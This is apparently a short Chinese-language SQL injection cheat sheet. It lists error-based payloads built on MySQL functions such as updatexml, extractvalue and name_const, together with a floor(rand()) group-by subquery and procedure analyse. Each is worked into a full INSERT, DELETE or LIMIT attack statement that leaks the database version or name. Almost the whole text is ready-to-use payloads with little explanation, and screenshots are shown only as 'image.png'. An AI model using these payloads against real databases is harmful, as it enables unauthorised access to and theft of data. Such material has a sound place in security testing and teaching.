1.函數(shù):updatexml()
關(guān)鍵語句:
updatexml(1,concat(0x7e,(version())),0) or '','Nervo');
攻擊語句:
INSERT INTO users (id,name,password) VALUES (2,'0livia' or updatexml (1,concat(0x7e,(version())),0) or'', 'Nervo');
image.png
2.函數(shù):extractvalue()
關(guān)鍵語句:
extractvalue(1,concat(0x7e,(version()))) or '','Nervo');
攻擊語句:
INSERT INTO users (id,name,password) VALUES (2,'0livia' or extractvalue (1,concat(0x7e,(version()))) or'', 'Nervo');
image.png
3.函數(shù):name_const()
關(guān)鍵語句:
SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '','Nervo'
攻擊語句:
INSERT INTO users (id,name,password) VALUES (1,'0livia' or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '','Nervo');
image.png
4.函數(shù):利用子查詢注入獲取數(shù)據(jù)
攻擊語句:
INSERT INTO users (id,name,password) VALUES (1,'0livia' or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'','Nervo');
image.png
5.update
基本和insert類似碱呼,函數(shù)一致
image.png
5.delete
delete from users where id=0 or updatexml(1,concat(0x7e,(version())),0) or '';
image.png
5.limit
select * from news where id>0 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
image.png
